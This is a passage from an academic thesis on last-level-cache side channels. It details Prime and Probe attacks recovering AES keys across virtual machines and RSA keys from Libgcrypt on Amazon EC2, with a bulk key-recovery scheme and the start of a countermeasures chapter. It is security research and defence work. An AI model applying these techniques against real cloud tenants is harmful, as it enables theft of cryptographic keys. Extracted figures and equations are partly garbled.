In this section we analyze our experiment setup and the results obtained in native
machine, single VM and in the cross-VM scenarios, specifically with deduplication-
free hypervisors where Flush and Reload and Invalidate and Transfer could not
succeed.
6.8.2.1 Testbed Setup
The machine used for all our experiments is a dual core Nehalem Intel i5-650 [inta]
clocked at 3.2 GHz. This machine works with 64 byte cache lines and has private 8-
way associative L1 and L2 caches of size 215and 218bytes, respectively. In contrast,
the 16-way associative L3 cache is shared among all the cores and has a size of 222
bytes, divided into two slices. Consequently, the L3 cache will have 212sets in total.
Therefore 6 bits are needed to address the byte address in a cache line and 12 more
bits to specify the set in the L3 cache. The huge page size is set to 2 MB, which
ensures a set field length of 21 bits that are untouched in the virtual to physical
address translation stage. All the guest OSs use Ubuntu 12.04, while the VMMs
used in our cloud experiments are Xen 4.1 fully virtualized and VMware ESXI 5.5.
Both allow the usage of huge size pages by guest OSs [BDF+03, Xenb, xena]. None
of them implements memory deduplication mechanisms; Xen because it lacks of
such a feature, VMware because we disabled it manually. Recall that, under this
settings, Flush and Reload andInvalidate and Transfer would not be able to recover
any meaningful information. We will observe how this is not the case for Prime and
Probe .
The target process uses the C reference implementation of OpenSSL1.0.1f ,
which is the default if the library is configured with no-asm and no-hw options.
We would like to remark that these are not the default OpenSSL installation op-
tions in most of the products.
The attack scenario is going to be the same one as in Section 4.4, where one
process/VM is handling encryption requests with an secret key. The attacker’s pro-
cess/VM is co-located with the encryption server, but on different cores. We assume
synchronization with the server, i.e, the attacker starts the Prime and Probe spy
process and then sends random plaintexts to the encryption server. The communi-
cation between encryption server and attacker is carried out via socket connections.
Upon the reception of the ciphertext, the attacker measures the L3 cache usage by
thePrime and Probe spy process. All measurements are taken by the attackers pro-
cess/VM with the rdtscp function, which not only reads the time stamp counters
but also ensures that all previous processes have finished before its execution [rdt].
101
10015020025030035040045050055060000.010.020.030.040.050.060.070.08
Hardware cycles
a)Probability
100 150 200 250 300 35000.050.10.150.20.250.30.350.4
Hardware cycles
b)ProbabilityRegion where T−table 
line has  not been usedRegion where T−table 
line has been usedFigure 6.9: Histograms of 500 access times monitored in the probe stage for a) a
set used by a T-table memory line and b) a set not used by a T-able memory line.
Measurements are taken in the Xen 4.1 cross-VM scenario.
6.8.2.2 The Cross-Core Cross-VM Attack
We perform the attack in three different scenarios: native machine, single VM and
cross-VM. In the native and single VM scenarios, we assume that the huge size
pages are set to be used by any non-root process running in the OS. Recall that in
the cross-VM scenario, the attacker has administrator rights in his own OS.
The first step is to recognize the access pattern of the L3 cache in our Intel i5-
650. Making use of the knowledge of the slice selection algorithm in Section 6.7.4,
we observe that odd blocks (17th bit of the physical address equal to 1) and even
blocks (17th bit of the physical address equal to 0) are allocate in different slices.
Thus we need 16 odd blocks to fill a set in the odd slice, whereas we need 16 even
blocks to fill a specific set in the even slice.
The second step is to recognize the set that each T-table cache line occupies in
the L3 cache. For that purpose we monitor each of the possible sets according to
the offset obtained from the linux shared library alignment feature. Recall that if
the offset modulo 64 f0of one of the T-tables is known, we only need check the sets
that are 64 positions apart, starting from f0. By sending random plaintexts the set
holding a T-table cache line is used around 90% of the times, while around 10% of
the times the set will remain unused. The difference between a set allocating a T-
table cache line and a set not allocating a T-table cache line can be graphically seen
in Figure 6.9, where 500 random encryptions were monitored with Prime and Probe
for both cases in a cross-VM scenario in Xen 4.1. It can be observed that monitoring
an unused set results in more stable timings in the range of 200-300 cycles. However
102
0 50 100 150 200 25000.10.20.30.40.50.60.70.80.91
Ciphertext valueMiss counter value normalized with maximumAverage/2Figure 6.10: Miss counter values for ciphertext 0 normalized to the maximum value.
The key is e1 and we are monitoring the last 8 values of the T-table (since the table
starts in the middle of a memory line).
monitoring a set used by the T-tables outputs higher time values around 90% of
the time, whereas we still see some lower time values below 300 around 10% of the
times. Note that the key used by the AES server is irrelevant in this step, since the
set used by the T-table cache lines is going to be independent of the key.
The last step is to run Prime and Probe to recover the AES key used by the
AES server. We consider as valid ciphertexts for the key recovery step those that
are at least below half the average of the overall timings. This threshold is based
on empirical results that can be seen in Figure 6.10, and is calculated as the overall
counter average divided by 2. The figure presents the miss counter value for all the
possible ciphertext values of C0, when the last line in the corresponding T-table
is monitored. The key in this case is 0 xe1 and the measurements are taken in a
cross-VM scenario in Xen 4.1. In this case only 8 values take low miss counter
values because the T-table finishes in the middle of a cache line. These values are
clearly distinguishable from the rest and appear in opposite sides of the empirical
threshold.
Results for the three scenarios are presented in Figure 6.11, where it can be
observed that the noisier the scenario is, e.g. in the cross-VM scenario, the more
monitored encryptions are needed to recover the key. The plot shows the number of
correctly guessed key bytes vs. the number of encryptions needed. Recall that the
maximum number of correctly guessed key bytes is 16 for AES-128. The attack only
needs 150.000 encryptions to succeed on recovering the full AES key in the native
OS scenario. Due to the higher noise in the cloud setting, the single VM recovers
103
0 100 200 300 400 500 600 7000246810121416182022
Number of encryptions x1000Number of key bytes correctly guessed
  
Native OS scenario
XEN Single VM scenario
XEN Cross VM scenario
VMware Cross VM scenarioFigure 6.11: Number of key bytes correctly recovered vs number of encryptions
needed for native OS, single VM and cross-VM scenarios.
the full key with 250.000 encryptions. The cross-VM scenario was analyzed in two
popular hypervisors, Xen and VMware, requiring 650.000 and 500.000 encryptions to
recover the 16 key bytes respectively. We believe that Xen requires a higher number
of encryptions due to the higher noise caused by the usage of a fully virtualized
hypervisor. It is important to remark that the attack is completed in only 9 and
35 seconds, respectively, for the native and single VM scenarios. In the cross VM
scenario, the attack succeeds in recovering the full key in 90 and 150 seconds in
VMware and Xen, respectively. Recall that in the cross-VM scenario the external
IP communication adds significant latency.
In short, compared to the Flush and Reload attack earlier presented, the Prime
and Probe attack needs more encryptions to succeed in recovering the key. This is
an expected behavior, as the Prime and Probe attack suffers more from noise. In-
deed, Flush and Reload needswaccesses from an unrelated process to create a noisy
measurement, being wthe associativity of the cache. However, as the Prime and
Probe attack fills the whole set, a simple access from an unrelated process to the set
being primed create a noisy measurement. Nevertheless, Prime and Probe succeeds
to recover the key in hypervisors where Flush and Reload andInvalidate and Trans-
fercannot, including commercial clouds, which do not have memory deduplication
enabled. We present a full real world scenario attack using Prime and Probe in the
next section.
104
6.9 Recovering RSA Keys in Amazon EC2
As we said, the Prime and Probe attack does not assume any special requirements
but that attacker and victim are co-resident in the same CPU socket. Thus, there is
no reason why it cannot succeed in commercial clouds, like Amazon EC2. Amazon
EC2 mostly uses Intel-based servers, for wich we know that the LLC is inclusive.
More than that, the market share that Intel has on desktop and server processors
was more than 80% at the beginning of 2016 [Alp09], and since Intel does not seem
to offer non-inclusive caches in these devices (at least we have not observed any),
our attack would work in big amount of current computers. In the cloud scenario, of
course, co-residency has first to be achieved with the target. We assume co-residency
is achieved (in fact, with the methodologies described in [VZRS15, IGES16]), and
that the attacker utilizes the same hardware resources as a RSA decryption server.
To prove the viability of the Prime and Probe attack in Amazon EC2 across
co-located VMs, we introduce how it can be utilized to steal RSA cryptographic
keys. It is important to remark that the attack is not processor specific, and can
be implemented in any processor with inclusive last level caches.
The attack targets a sliding window implementation of RSA-2048. Note that
attacking such an implementation is far more difficult than the one described in
Section 5.4, since the multiplication function by itself does not give us enough in-
formation about the key. In this case, contrary to the case of AES and as explained
in Section 2.4.2, we put our focus in the multiplicants, which are dynamically al-
located. Thus Flush and Reload , even in deduplication enabled systems would be
able to recover such information.
We will use Libgcrypt 1.6.2 as our target library, which not only uses a slid-
ing window implementation but also uses CRT and message blinding techniques 7.
The message blinding process is performed as a side channel countermeasure for
chosen-ciphertext attacks, in response to studies such as [GST14, GPPT15].
However, note that this does not prevent our attack, as we only focuses on the
key management without requiring any particular ciphertext shape. Further, the
CRT implementations makes us have to recover dpanddqseparately, but once the
knowledge of both is acquired, the full key can be retrieved [HDWH12, Ham13].
The modular exponentiation in Libgcrypt uses the sliding window approach ex-
plained in Algorithm 8. In particular, libgcrypt pre-computes the values c3,c5,c7,...,
c2W−1in a table. Then, the key is processed in windows that are required to start
and finish with a set bit, and have a maximum length of W, beingWthe window
size. Until the set bits are found, squares are issued normally. When the set bits and
the window of length l(l<=W) is found,lsquares are issued and a multiplication
with the appropriate table entry is performed. Clearly, the accesses to the precom-
puted table leak information about the window being processed, and therefore, the
key bit values of the windows.
Our attack uses the Prime and Probe side channel technique to recover the
positions of the table Tthat holds the values c3,c5,c7,...,c2W−1whereWis the
105
Algorithm 7 RSA with CRT and Message Blinding
Input : Ciphertext c∈ZN, Exponents d,e, ModulusN=pq
Output :m
r$←ZNwith gcd(r,N) =
1//Message Blinding
c∗=c·remodN d p=dmod (p−1)
//CRT conversion
dq=dmod (q−1)m1= (c∗)dp
modp//Modular Exponentiation
m2= (c∗)dqmodq h=q−1·(m1−m2)
modp//Undo CRT
m∗=m2+h·q m=m∗·r−1modN
//Undo Blinding
returnm
window size. For CRT-RSA with 2048 bit keys, W= 5 for both exponentiations
dp,dq. Observe that, if all the positions are recovered correctly, reconstructing the
key is a straightforward step. In order to perform the attack:
•We make use of the fact that the offset of the address of each table position
entry does not change when a new decryption process is executed. Therefore,
we only need to monitor a subsection of all possible sets, yielding a lower
number of traces.
•Instead of the monitoring both the multiplication and the table entry set (as
in [Fan15] for El Gamal), we only monitor a table entry set in one slice . This
avoids the step where the attacker has to locate the multiplication set and
avoids an additional source of noise.
Recall that we do not control the victim’s user address space. This means that
we do not know the location of each of the table entries, which indeed changes from
execution to execution, as it is dynamically allocated. Therefore we will monitor a
set hoping that it will be accessed by the algorithm. However, our analysis shows a
special behavior: each time a new decryption process is started, even if the location
changes, the offset field does not change from decryption to decryption. Thus, we
candirectly relate a monitored set offset with a specific entry in the multiplication
table.
The knowledge of the processor in which the attack is going to be carried out
gives an estimation of the probability that the set/slice we monitor collides with the
set/slice the victim is using. For each table entry, we fix a specific set/slice where not
much noise is observed. In the Intel Xeon E5-2670 v2 processors utilized by Amazon
EC2, the LLC is divided in 2048 sets and 10 slices. Therefore, knowing the lowest
106
Algorithm 8 RSA Sliding-Window Exponentiation
Input : Ciphertext c∈ZN%, Exponent d, Window Size w
Output :cdmodN
//Table Precomputation step
T[0] =c3modN v=c2modNforifrom 1to2w−1−1do
T[i] =T[i−1]·vmodN
end
//Exponentiation step:
b= 1,j=len(d)whilej >0do
ifej== 0 then
b=b2modN j=j−1
else
Findejej−1...e l|j−l+ 1≤wwithel= 1forkfrom 1toldo
b=b2j−l+1modN
end
ifej== 1 then
b=b·cmodN
else
b=b·T[(ei−3)/2] modN
end
j=j−l−1
end
end
returnb
12 bits of the table locations, we will need to monitor oneset/slice that solves s
mod 64 =o, wheresis the set number and ois the offset for a table location. This
increases the probability of probing the correct set from 1 /(2048·10) = 1/20480 to
1/((2048·10)/64) = 1/320, reducing the number of traces to recover the key by a
factor of 64. Thus our spy process will monitor accesses to oneof the 320 set/slices
related to a table entry, hoping that the RSA encryption accesses it when we run
repeated decryptions.
Recall that we reverse engineered the slice selection algorithm for Intel Xeon E5-
2670 v2 processors in Section 6.7.7. Thanks to the knowledge of the non linear slice
selection algorithm, we can easily change our monitored set/slice if we see a high
amount of noise in one particular set/slice. Since we also have to monitor a different
set per table entry, it also helps us to change our eviction set accordingly. Thanks
to the knowledge of the non linear slice selection algorithm, we will select a range
of sets/slices s1,s2,...,s nfor which the memory blocks that create the eviction
sets do not change, and that allow us to profile all the precomputed table entries.
The threshold is different for each of the sets, since the time to access different
107
slices usually varies. Thus, the threshold for each of the sets has to be calculated
before the monitoring phase. In order to improve the applicability of the attack,
the LLC can be monitored to detect whether there are RSA decryptions or not in
the co-located VMs as proposed in [IGES16]. After it is proven that there are RSA
decryptions the attack can be performed.
In order to obtain high quality timing leakage, we synchronize the spy process
and the RSA decryption by initiating a communication between the victim and
attacker, e.g. by sending a TLS request. Note that we are looking for a particular
pattern observed for the RSA table entry multiplications, and therefore processes
scheduled before the RSA decryption will not be counted as valid traces. In short,
the attacker will communicate with the victim before the decryption. After this
initial communication, the victim will start the decryption while the attacker starts
monitoring the cache usage. In this way, we monitor 4,000 RSA decryptions with
the same key and same ciphertext for each of the 16 different sets related to the 16
table entries.
We investigate a hypothetical case where a system with dual CPU sockets is used.
In such a system, depending on the hypervisor CPU management, two scenarios can
play out; processes moving between sockets and processes assigned to specific CPUs.
In the former scenario, we can observe the necessary number of decryption samples
simply by waiting over a longer period of time. In this scenario, the attacker would
collect traces and only use the information obtained during the times the attacker
and the victim share sockets and discard the rest as missed traces. In the latter
scenario, once the attacker achieves co-location, as we have in Amazon EC2, the
attacker will always run on the same CPU as the target hence the attack will succeed
in a shorter span of time.
Among the 4,000 observations for each monitored set, only a small portion con-
tains information about the multiplication operations with the corresponding table
entry. These are recognized because their exponentiation trace pattern differs from
that of unrelated sets. In order to identify where each exponentiation occurs, we
inspected 100 traces and created the timeline shown in Figure 6.12(b). It can be ob-
served that the first exponentiation starts after 37% of the overall decryption time.
Note that among all the traces recovered, only those that have more than 20 and
less than 100 peaks are considered. The remaining ones are discarded as noise. Fig-
ure 6.12 shows measurements where no correct pattern was detected (Fig. 6.12(a)),
and where a correct pattern was measured (Fig. 6.12(b)).
In general, after the elimination step, there are 8 −12 correct traces left per set.
We observe that data obtained from each of these sets corresponds to 2 consecutive
table positions. This is a direct result of CPU cache prefetching. When a cache line
that holds a table position is loaded into the cache, the neighboring table position
is also loaded due to cache locality principle.
For each graph to be processed, we first need to align the creation of the look-up
table with the traces. Identifying the table creation step is trivial since each table
position is used twice, taking two or more time slots. Figure 6.13(a) shows the table
108
timeslot0 2000 4000 6000 8000 10000Reload time
050100150200250
timeslot0 2000 4000 6000 8000 10000Reload time
050100150200250
Second Secret
Exponent (dq)Decryption
StartFirst Secret
Exponent (dp)Figure 6.12: Different sets of data where we find a) trace that does not contain
information b) trace that contains information about the key
access position indexes aligned with the table creation. In the figure, the top graph
shows the true table accesses while the rest of the graphs show the measured data.
It can be observed that the measured traces suffer from misalignment due to noise
from various sources e.g. RSA or co-located neighbors.
In consequence, we apply alignment and noise reduction techniques, typically
utilized in DPA attacks [KJJ99] to obtain a clean cache trace. The result after such
an alignment process can be observed in Figure 6.14, which shows the real indices
of a particular table entry with those retrieved from our analysis.
Despite the good results after these noise reduction techniques, we still do not
end up with a perfect trace. The overall results are presented in Table 6.4, where
a 0.65% of the peaks are missdetected. Thus, the key recovery algorithm described
in [Ham13] is applied to establish relationships between noisy dpanddqto recover
a full clean RSA key. In order to apply such an algorithm we need information
about the public key. We distinguish two different scenarios in which the attacker
is able to utilize public keys for the error correction algorithm. In both, we assume
the attacker has already retrieved the leakage from the RSA decryption key of a
(potentially known) server:
•Targeted Co-location: The Public Key is Known In this case we assume
109
timeslot0 500 1000 1500 2000 2500 3000024681012
timeslot0 500 1000 1500 2000 2500 3000024681012Figure 6.13: 10 traces from the same set where a) they are divided into blocks for
a correlation alignment process b) they have been aligned and the peaks can be
extracted
that the attacker implemented a targeted co-location against a known server,
and that she has enough information about the public key parameters of the
target.
•Bulk Key Recovery: The Public Key is Unknown In this scenario, the
attacker can build up a database of public keys by mapping the entire IP range
110
Normalized timeslot0 200 400 600 800 1000 1200Real    Data
012Figure 6.14: Comparison of the final obtained peaks with the correct peaks with
adjusted timeslot resolution
Table 6.4: Successfully recovered peaks on average in an exponentiation
Average Number of traces/set 4000
Average number of correct graphs/set 10
Wrong detected peaks 7.19%
Missdetected peaks 0.65%
Correctly detected peaks 92.15%
of the targeted Amazon EC2 region and retrieve all the public keys of hosts
that have the TLS port open. The attacker then runs the above described
algorithm for each of the recovered private keys and the entire public key
database. Having the list of ’neighboring’ IPs with an open TLS port also
allows the attacker to initiate TLS handshakes to make the servers use their
private keys with high frequency.
In the first scenario, the attacker has information about the public key and
thus he can apply the error correction algorithm that we will describe directly.
In the second scenario, the attacker has a database of public keys, and he does
not know which public key the private key leakage belongs to. In this case, the
attacker implements the error correction algorithm with each of the public keys in
the database until he finds a successful correlation. We proceed next to explain the
algorithm to recover the noise-free decryption key.
The leakage analysis described recovers information on the CRT version of the
secret exponent d, namelydp=dmod (p−1) anddq=dmod (q−1). A noise-free
version of either one can be used to trivially recover the factorization of N=pq,
since gcd(m−medp,N) =pfor virtually any m[CS04]. Thus, our goal is to retrieve
noise-freedpordqfrom noisy d∗pandd∗q. Note that this is not our case, as even
with alignment and noise filtering techniques we still had miss-detected and wrongly
detected peaks. In such cases, we can exploit their relation to the known public key
can if the used public exponent eis small [Ham13]. Note that this will be our case,
as almost all RSA implementations currently use e= 216+ 1 due to the heavy
111
performance boost over a random and full size e. For CRT exponents we calculated
dpanddqasdp=dmod (p−1) anddq=dmod (q−1). Multiplying both sides
by e we obtain
edp= 1 mod ( p−1) (6.6)
edq= 1 mod ( q−1) (6.7)
Asd∗emod ((p−1)∗(q−1)) = 1. This means that exist integers kpandkq
such thatedp=kp(p−1) + 1 for some 1 ≤kp<eandedq=kq(q−1) + 1 for some
1≤kq<e. This yields kpp=edp+kp−1 andkqp=edq+kq−1. If we multiply
this equations together we obtain the main equation we will utilize for our noise
correction error algorithm:
kpkqN= (edp+kp−1)(edq+kq−1). (6.8)
Note that there are nice tricks that help solving this equation. First, we can take
the equation modulo esuch that the terms e∗dpande∗dqdisappear, giving us the
equationkpkqN= (kp−1)(kq−1) (mode). Aseis usually 216+ 1 and 1≤kp<e
we can obtain kpandkqwith this equation considering all possible 216set ofkp(and
their corresponding values kq).
Next, assume we are given the first tbits ofdpanddq, e.g.a=dpmod 2tand
b=dqmod 2t. For eachkpwe check whether δ(a,b,t ) = 0 where
δ(a,b,t ) =kpkqN−(ea+kp−1)(eb+kq−1) (mod 2t) (6.9)
which indeed will indicate us whether for a choice of kp, the least-significant t
bits ofdp,dqare correct. We can
•Check parts ofdpanddqby verifying if the test δ(dp(t),dq(t),t) = 0 holds
fort∈[1,⌈log(p)⌉].
•Fix alignment and minor errors by shifting and varying dp(t) anddq(t),
and then sieving working cases by checking if δ(dp(t),dq(t),t) = 0,
•Recover parts ofdqgivendp(and vice versa) by solving the error equation
δ(dp(t),dq(t),t) = 0 in case the data is missing or too noisy to correct.
Note that the algorithm may need to try all 216values ofkpin a loop. Further,
in the last case where we recover a missing data part using the checking equation we
need to speculatively continue the iteration for a few more steps to see whether this
leads to many mistakes in the information we recovered of dpanddq. If we observe
too many discrepancies between the solution given by the Equation 6.9 and the
recovered key information for a given value twe may early terminate the execution
thread without having to iterate over the entire size end of dpanddq.
112
Algorithm 9 Windowed RSA Key Recovery with Noise
Input : Cache noisy window information wp[0],...,w p[n] and
wq[0],...,w q[n], public key emodulusN
Output : Noise free dpanddq
forkpfrom 1toe−1do
Computekq= (1−kp)(kpN−kp+ 1)−1(mode);
whilei<|wp|do
Process windows wp[i],wp[i+ 1];
Introduce shifts; vary ip[i]] upmax zeros;
foreachdpvariation do
ComputeX=∑i+1
j=0wp[j]2ip[j];
Identifywqthat overlap with wp[i],wp[i+ 1];
ComputeY=∑i+1
j=0wq[j]2iq[j];
ifδ(X,Y,t )=0then
Updatewp,ip,wq,iq ;
Create thread for i+ 1;
end
ifif no check succeeded then
Too many failures: abandon thread;
end
ifmax zeros achieved then
i=i−1;
end
Updateip,wq,iq ;
Create thread for i;
end
end
end
return correctdpanddq;
113
To see how this approach can be adapted into our setting, we need to consider the
error distribution observed in dpanddqas recovered by cache timing. Furthermore,
since the sliding window algorithm was used in the RSA exponentiation operation,
we are dealing with variable size (1-5 bit) windows with contents wp,wq, and window
positionsip,iqfordpanddq, respectively.
The windows are separated by 0 strings. We observed:
•The window wpcontents for dphad no errors and were in the correct order.
There were slight misalignments in the window positions ipwith extra or
missing zeros in between.
•In contrast, dqhad not only alignment problems but also few windows with
incorrect content, extra windows, and missing windows (overwritten by zeros).
The missing windows were detectable since we do not expect unusually long
zero strings in a random dq.
•Since the iterations proceed from the most significant windows to the least we
observed more errors towards the least significant words, especially in dq.
Algorithm 9 shows how one can progressively error correct dpanddqby pro-
cessing groups of consecutive lwindows of dp. For each guess of kp, the algorithm
creates new execution threads and compares the windows with those recovered from
the cache measurements. The algorithm kills a thread when too many checks fail to
produce any matching on different windows. However, then the kill threshold has to
be increased and the depth of the computation threads and more importantly the
number of variations that need to be tested increases significantly. In this case, the
algorithm finds the correct private key in the order of microseconds for a noise-free
dpand needs 4 seconds for our recovered dp.
In the South America Amazon EC2 region, we have found 36000+ IP addresses
with the TLS port open using nmap . We used such a region to improve our co-
location chances, as the number of servers is lower compared to the US region.
With a public key database of that size, our algorithm takes between less than a
second (for noise-free dps) and 30 CPU hours (noisy dps) to check each private key
with the public key database. This approach recovers the public/private key pair,
and consequently, the identity of the key owner.
6.10 Prime and Probe Outcomes
This chapter introduced Prime and Probe , an attack that is memory deduplica-
tion agnostic and that is applicable in those systems where Flush and Reload and
Invalidate and Transfer failed, e.g., commercial clouds like Amazon EC2. Prime
and Probe works by creating set collisions in the LLC, overcoming several difficul-
ties inherited to LLC like slices or the lack of knowledge of sufficient physical bits.
We utilized reverse engineering tools and huge pages to overcome this issues, and
114
demonstrated its applicability by recovering AES and RSA keys. In systems where
both Flush and Reload and Prime and Probe can be applied, the first will give a
cleaner channel, as it is more resistant to LLC noise.
115
Chapter 7
Countermeasures
In the previous chapters we covered the effectiveness of three cache based side chan-
nel attacks, Flush and Reload ,Invalidate and Transfer and Prime and Probe to
recover sensitive information from co-resident users in a number of scenarios. All
have distinct requirements that make them applicable in very different scenarios.
For instance, we observed how Flush and Reload and Invalidate and Transfer suc-
ceed in systems with memory deduplication features, as it is the case of most PaaS
clouds, some IaaS clouds and smartphones. Prime and Probe does not require any
special assumption but CPU co-residency, and thus, it is not only applicable in
those scenarios in which Flush and Reload is, but also can be executed in every
IaaS cloud, as Javascript extensions [OKSK15] or in TEEs (e.g. SGX or ARM
Trustzone) [SWG+17, BMD+17]. Observe how some of these scenarios belong to
the category of ”‘everyday use technology”. Therefore, the aforementioned cache
attacks are applicable in realistic scenarios and in response, appropriate counter-
measures have to be taken to defend against them.
Indeed, despite the big popularity that cross-core microarchitectural attacks ac-
quired, countermeasures are not being deployed in commercial software. To the
best of our knowledge, neither commercial clouds, OS designers, software develop-
ers nor hardware manufacturers are developing countermeasures against them. In
this chapter, we propose two novel countermeasures that can aid all these agents
prevent cache attacks in particular (and microarchitectural attacks in general) from
succeeding. We first revisit countermeasures that have been proposed by other
works to avoid the leakage exploitation through the LLC, categorizing them as
hardware, software and application layer countermeasures. Next, we present a LLC
leakage finder tool for cryptographic libraries, that evaluates whether cryptographic
algorithms are designed properly and that substantially improves on previous ap-
proaches, demonstrated by the 5 CVE numbers (and at least 4 more being studied)
that we obtained. Finally, we develop a static microarchitectural malware analyzer
that can be utilized by online repository distributors verify the sanity of the bina-
ries being offered (which remain undetected to the best antivirus software) before a
end-user gets to execute them.
116
7.1 Existing Countermeasures
Alongside ever improving cache and microarchitectural attacks, countermeasures
have been proposed in literature as well. We divide them in three basic categories:
hardware, software and application layer countermeasures.
Page [Pag05] proposed a hardware countermeasure that partitions the cache such
that cache conflicts between different users do not occur. Wang et al. [WL07] pro-
posed the design of new caches with different characteristics, which involve the abil-
ity of locking security-related ways in the cache or enabling cache interference ran-
domization. These implementations were later improved by Kong et al. [KASZ09].
Although previous approaches might give solution to Prime and Probe based at-
tacks, it is still an open question as to how these solutions would prevent Flush
and Reload and Invalidate and Transfer attacks. Recently, Intel added the Cache
Allocation Technology (CAT) feature to their CPUs, which was investigated by Liu
et al. [LGY+16] as a countermeasure to Prime and Probe attacks, while considering
deduplication-free systems to defeat Flush and Reload and Invalidate and Transfer .
Further mechanisms have been proposed at the software level. For instance,
Page Coloring was proposed by Kim et al. [KPMR12] as a solution in which each
user gets pages that do no collide with others in cache. Later Zhang et al. [ZZL16]
expanded the work by Chiapetta et al. [CSY15] and proposed a cache attack de-
tector mechanism, cloud radar, which monitors the performance counters looking
for patterns observed in cache attacks. Recently, Zhang et al. [ZRZ16] developed a
smart access-based memory page management to defeat both Prime and Probe and
Flush and Reload .
Another approach is the design of code that does not exhibit cache leakage at the
application level. Almeida et al. [ABB+16] developed a compiler based methodology
to verify constant-time code, which for instance prevents attacks on the execution
flow via the instruction cache. Zankl et al. [ZHS16] proposed a tool based on dy-
namic binary instrumentation that automatically detects instruction cache leaks in
modular exponentiation software.
In the following we provide a more detailed explanation of two of such coun-
termeasures, mainly page coloring and cloud radar. The goal is to help the reader
understand some of the existing countermeasure functionalities.
7.1.1 Page Coloring
As explained in Section 6.1, the location that a memory block will occupy in the
cache directly depends on some of its physical address bits. The main idea behind
page coloring is that the OS controls the assignment of those bits such that memory
blocks belonging to different users/processes/VMs do not collide in the cache. Page
Coloring was implemented in [KPMR12] as a mechanisms to avoid cache leakages.
The OS/hypervisor colors DRAM pages by assigning a different color to each
different bit combination for the bits that select the position of a memory block in
117
Figure 7.1: Page Coloring implementation, where DRAM is divided into different
colors that are assigned to different users that will not collide in the cache
the cache. Figure 7.1 shows the main idea in which the cache is partitioned in 4
different colors, and where 2 bits of the physical address decide the color. Upon
DRAM allocation requests made by processes/users, the OS assigns each user only
pages of one color, and different to any other user in the system. As bits 12 and 13
of the physical address are also involved in the selection of the set that a memory
block occupies, the coloring ensures that pages belonging to different users do not
collide in the cache . Figure 7.1 shows the complete process and how users do not
collide in the cache utilization. If memory pages do not collide, Prime and Probe like
attacks are not possible, as the attacker cannot evict the victims data. Further, page
coloring and memory deduplication are antagonic concepts, and therefore neither
Flush and Reload norInvalidate and Transfer would be applicable if the first is
implemented. However, page coloring might be difficult to implement in systems
with inconsistent loads, as the number of colors would have to be re-calculated for
different loads.
7.1.2 Performance Event Monitorization to Detect Cache
Attacks
The LLC attacks that we (and other concurrent works) exploited take advantage
of very specific characteristics in the cache, and implement very specific memory
accesses. Thus, a mechanisms that constantly monitors the LLC trying to detect
malicious utilization would most likely succeed on detecting LLC attacks. Zhang et
al. [ZZL16] proposed such a mechanism, in which performance counters are utilized
to monitor the hardware usage.
This mechanisms is implemented at the OS or hypervisor level, depending on
the system to defend. In particular, very specific hardware events are monitored
118
Figure 7.2: HPCs as a methodology to find whether cache attacks are being executed
by the processes in the system
looking for cache attack patterns. Obviously, the most affected hardware events
are cache misses and hits, but additional perhaps less obvious hardware events are
also monitored. In particular, this mechanisms usually do not constantly monitor
every process in the system, but monitor random processes for a specific period of
time. The detection system can also be aided by machine learning algorithms that
are beforehand trained. When a cache attack evidence is observed, the process can
be either isolated or prevented from being executed again. Figure 7.2 represents
graphically the process. The main downside of this kind of mechanisms is the big
overhead they impose to the defending system.
7.2 Problems with Previously Existing Counter-
measures
Even though the aforementioned studies have investigated solutions to stop the
exploitation of hardware caches as a covert channel, we observe some concerns that
might explain why these have not been adopted by commercial products.
•Application level countermeasures: One of the main problems that we
observe in previously proposed application level countermeasures is the high
number of false positives that they usually exhibit. In fact, cryptographic al-
gorithms usually make secret dependent memory accesses, but this does not
mean they leak information about the key, as they might happen outside the
main loop or within the same cache line. Furthermore, some of the proposed
countermeasures do not take into account the entire memory leakage spec-
trum but only a subset of it. For instance, Zankl et al. [ZHS16] utilize the
119
PIN instrumentation tool to find distinct instruction execution flow (static
memory) for different keys, and correlate it with the key. Extracting the same
information for dynamically allocated data is not an option, as their memory
addresses change from execution to execution.
•OS level countermeasures: Although some of the proposed OS level coun-
termeasures would indeed prevent anyleakage stemming from cache covert
channels, we have not observed any of them being implemented in commercial
products. We believe there are several reasons preventing their adoption, the
main one being the performance overhead associated with these countermea-
sures. Further, the balanced design of such countermeasures is not an easy
task. For instance, page coloring might lead to a miss-utilization of the cache
when sufficient workloads are not being executed, while it might lead to leak-
age exploitation when the number of workloads is higher than the number of
colors. We hardly believe these facts take a key role on the decision of the
implementation of OS level countermeasures.
•Hardware level countermeasures: Among our three countermeasure cat-
egories, we believe the most difficult one to be adopted are the hardware level
countermeasures. These involve re-designing the hardware, testing it against
microarchitectural attack vectors and producing a full new processor family.
This entire process usually takes several years, therefore making them unlikely
to be utilizable in the short run.
The problems inherited to OS/hardware countermeasures and their non-adoption
leaves any end user or application designer alone in the response to microarchitec-
tural attacks in general and cache attacks in particular. In such a situation, the only
solution is to create effective and easily implementable application level countermea-
sures. In the following sections, we aim at giving response to such concerns; first, by
proposing a leakage sanity verification tool for cryptographic libraries that can help
at achieving leakage free code design, second, by proposing a static analysis tool to
be utilized by online binary distributors to ensure they deliver microarchitectural
attack free applications. Note that even though our countermeasures are intended
to be mainly used by specific agents (i.e. cryptographic code designers and online
repository distributors), they can also be utilized by any end user willing to improve
the security of his system.
7.3 Detecting Cache Leakages at the Source Code
We demonstrated how LLC attacks can recover a wide range of information, in-
cluding AES and RSA cryptographic keys. Furthermore, we demonstrated that
LLC attacks can be successfully applied in a commercial IaaS clouds like Ama-
zon EC2. In addition, these can also be a applied as Javascript execution in web
120
browsers [OKSK15] or even as malicious smartphone apps [LGS+16]. In short,
cache attacks have demonstrated to pose a severe threat applicable in a wide range
of scenarios. Particularly dangerous are attacks on cryptographic software, as cryp-
tography is the core component that every security solution in built upon.
We have discussed how these attacks can be stopped at three different lay-
ers; at the hardware [WL07], the OS/hypervisor [LGY+16] or at the application
layer [ZHS16]. While the first two involve overheads that hardware/OS designers
might not be willing to pay, little study has been made at catching and fixing cache
leakages before deployment. Not in vain, preventing leakage in security critical ap-
plications (and more specifically in cryptographic software) can be achieved by aware
code designers through proper implementation techniques. The few exceptions that
aimed at fixing this leakages in the source code either did not consider the entire
broad of memory types that can leak information [ZHS16] or lead to a high number
of false positives [ABB+16]. Thus, we observe a need for a tool that can catch the
vast majority of the subtle cache leakages that can arise before the cryptographic
software leaves the lab. We observe three main challenges in the prevention of cache
leakage exploitation:
•Stealthy: Leakage attacks are extremely hard to detect. The effects of an
attack may only be felt through performance degradation for a short duration
while leakage traces are being collected. After the attack is performed no
digital footprint is left. Hence standard detection techniques such as traffic,
